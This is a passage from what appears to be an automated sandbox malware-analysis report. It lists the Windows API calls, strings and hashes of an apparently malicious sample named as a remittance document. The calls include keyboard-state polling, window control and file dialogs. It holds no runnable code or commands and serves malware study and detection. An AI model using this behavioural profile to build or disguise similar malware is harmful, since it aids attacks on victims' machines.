                                                                      • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                                                                      • SendMessageW.USER32(?,00000402,?), ref: 00449399
                                                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$CharNext
                                                                      • String ID:
                                                                      • API String ID: 1350042424-0
                                                                      • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                      • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                                                                      • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                      • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                                                                      APIs
                                                                        • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                        • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                      • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                                                                      • _wcscpy.LIBCMT ref: 004787E5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                                                      • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                      • API String ID: 3052893215-2127371420
                                                                      • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                                      • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                                                                      • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                                      • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                                                                      APIs
                                                                      • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                                                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                      • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                                                                      • __swprintf.LIBCMT ref: 0045E7F7
                                                                      • _wprintf.LIBCMT ref: 0045E8B3
                                                                      • _wprintf.LIBCMT ref: 0045E8D7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                                      • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                      • API String ID: 2295938435-2354261254
                                                                      • Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                                      • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                                                                      • Opcode Fuzzy Hash: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                                      • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: __swprintf_wcscpy$__i64tow__itow
                                                                      • String ID: %.15g$0x%p$False$True
                                                                      • API String ID: 3038501623-2263619337
                                                                      • Opcode ID: 0ed174719ccce37c49a7b10a239214af4415cbf245d9ef728fb1cecd9ea5956d
                                                                      • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                                                                      • Opcode Fuzzy Hash: 0ed174719ccce37c49a7b10a239214af4415cbf245d9ef728fb1cecd9ea5956d
                                                                      • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                                                                      APIs
                                                                      • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                      • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                                                                      • __swprintf.LIBCMT ref: 0045E5F6
                                                                      • _wprintf.LIBCMT ref: 0045E6A3
                                                                      • _wprintf.LIBCMT ref: 0045E6C7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                                      • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                      • API String ID: 2295938435-8599901
                                                                      • Opcode ID: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                                      • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                                                                      • Opcode Fuzzy Hash: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                                      • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                                                                      APIs
                                                                      • timeGetTime.WINMM ref: 00443B67
                                                                        • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                                                                      • Sleep.KERNEL32(0000000A), ref: 00443B9F
                                                                      • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00443BC8
                                                                      • SetActiveWindow.USER32(00000000), ref: 00443BEC
                                                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                                                                      • SendMessageW.USER32(00000000,00000010,00000000,00000000), ref: 00443C22
                                                                      • Sleep.KERNEL32(000000FA), ref: 00443C2D
                                                                      • IsWindow.USER32(00000000), ref: 00443C3A
                                                                      • EndDialog.USER32(00000000,00000000), ref: 00443C4C
                                                                        • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                        • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                        • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                      • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                                                                      • String ID: BUTTON
                                                                      • API String ID: 1834419854-3405671355
                                                                      • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                                      • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                                                                      • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                                      • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                                                                      • LoadStringW.USER32(00000000), ref: 00454040
                                                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                      • _wprintf.LIBCMT ref: 00454074
                                                                      • __swprintf.LIBCMT ref: 004540A3
                                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                                                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                      • API String ID: 455036304-4153970271
                                                                      • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                                      • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                                                                      • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                                      • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                                                                      APIs
                                                                      • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                                                                      • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                                                                      • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                                                                      • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                                                                      • _memmove.LIBCMT ref: 00467EB8
                                                                      • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                                                                      • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                                                                      • _memmove.LIBCMT ref: 00467F6C
                                                                      • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                                                                      • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                                                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                        • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                      • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                      • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                                                                      • String ID:
                                                                      • API String ID: 2170234536-0
                                                                      • Opcode ID: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                                                      • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                                                                      • Opcode Fuzzy Hash: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                                                      • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                                                                      APIs
                                                                      • GetKeyboardState.USER32(?), ref: 00453CE0
                                                                      • SetKeyboardState.USER32(?), ref: 00453D3B
                                                                      • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                                                                      • GetKeyState.USER32(000000A0), ref: 00453D75
                                                                      • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                                                                      • GetKeyState.USER32(000000A1), ref: 00453DB5
                                                                      • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                                                                      • GetKeyState.USER32(00000011), ref: 00453DEF
                                                                      • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                                                                      • GetKeyState.USER32(00000012), ref: 00453E26
                                                                      • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                                                                      • GetKeyState.USER32(0000005B), ref: 00453E5D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: State$Async$Keyboard
                                                                      • String ID:
                                                                      • API String ID: 541375521-0
                                                                      • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                      • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                                                                      • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                      • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,00000001), ref: 004357DB
                                                                      • GetWindowRect.USER32(00000000,?), ref: 004357ED
                                                                      • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                                                                      • GetDlgItem.USER32(?,00000002), ref: 0043586A
                                                                      • GetWindowRect.USER32(00000000,?), ref: 0043587C
                                                                      • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                                                                      • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                                                                      • GetWindowRect.USER32(00000000,?), ref: 004358EE
                                                                      • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                                                                      • GetDlgItem.USER32(?,000003EA), ref: 00435941
                                                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ItemMoveRect$Invalidate
                                                                      • String ID:
                                                                      • API String ID: 3096461208-0
                                                                      • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                                      • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                                                                      • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                                      • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                                                                      APIs
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                                                                      • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                                                                      • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                                                                      • DeleteObject.GDI32(?), ref: 0047151E
                                                                      • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                                                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                                                                      • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                                                                      • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                                                                      • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                                                                      • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                                                                      • DeleteObject.GDI32(?), ref: 004715EA
                                                                      • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                                                                      • String ID:
                                                                      • API String ID: 3218148540-0
                                                                      • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                                      • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                                                                      • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                                      • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                      • String ID:
                                                                      • API String ID: 136442275-0
                                                                      • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                                      • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                                                                      • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                                      • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                                                                      APIs
                                                                      • _wcsncpy.LIBCMT ref: 00467490
                                                                      • _wcsncpy.LIBCMT ref: 004674BC
                                                                        • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                        • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                      • _wcstok.LIBCMT ref: 004674FF
                                                                        • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                                      • _wcstok.LIBCMT ref: 004675B2
                                                                      • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                                      • _wcslen.LIBCMT ref: 00467793
                                                                      • _wcscpy.LIBCMT ref: 00467641
                                                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                      • _wcslen.LIBCMT ref: 004677BD
                                                                      • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                                        • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                                      Strings
                                                                      Memory Dump Source
